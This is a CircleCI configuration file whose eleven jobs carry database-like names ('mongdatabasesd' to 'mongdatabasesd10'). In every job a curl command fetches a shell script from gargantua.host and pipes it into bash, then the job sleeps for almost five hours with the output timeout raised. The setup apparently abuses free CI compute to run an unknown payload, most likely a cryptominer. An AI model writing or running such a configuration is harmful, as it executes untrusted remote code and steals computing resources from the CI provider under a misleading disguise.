version: 2.1

jobs:
  mongdatabasesd:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanase.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mongdatabasesd1:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanase.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mongdatabasesd2:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanase.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mongdatabasesd3:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanase.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mongdatabasesd4:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanase.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mongdatabasesd5:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanase.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mongdatabasesd6:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanase.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mongdatabasesd7:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanase.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mongdatabasesd8:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanase.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mongdatabasesd9:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanase.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mongdatabasesd10:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekanase.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

workflows:
  main:
    jobs:
      - mongdatabasesd
      - mongdatabasesd1
      - mongdatabasesd2
      - mongdatabasesd3
      - mongdatabasesd4
      - mongdatabasesd5
      - mongdatabasesd6
      - mongdatabasesd7
      - mongdatabasesd8
      - mongdatabasesd9
      - mongdatabasesd10